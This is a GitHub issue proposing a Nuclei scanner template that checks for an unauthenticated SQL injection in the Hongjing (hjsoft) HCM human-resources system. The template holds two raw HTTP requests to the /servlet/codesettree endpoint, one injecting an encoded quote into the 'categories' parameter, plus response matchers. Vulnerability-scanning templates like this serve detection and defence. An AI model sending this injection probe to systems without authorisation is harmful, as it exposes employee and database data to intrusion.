### ISSUE TITLE
hjsoft-hcm-codesettree-serlvet-categories-sqli

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7985]
### Template Information:

hjsoft-hcm-codesettree-serlvet-categories-sqli
title="人力资源信息管理系统"

### Nuclei Template:

```yaml
id: hjsoft-hcm-codesettree-serlvet-categories-sqli

info:
  name: 宏景人力系统 SQL注入漏洞
  author: SleepingBag945
  severity: critical
  description: 由于系统未对用户的输入进行合理的处理，导致该系统存在SQL注入漏洞。攻击者可利用该漏洞获取数据库敏感信息。对攻击者来说，此漏洞的利用无需认证和鉴权，可通过该漏洞获取系统数据和用户数据，登录后台。
  tags: hjsoft,hcm

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31 HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~ HTTP/1.1
        Host: {{Hostname}}




    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_1,"TreeNode") && contains(body_1,"title=\"root")
          - status_code_2 == 500 && contains(body_2,"<title>ERROR") && contains(body_2,"mainbackground")
        condition: and

```
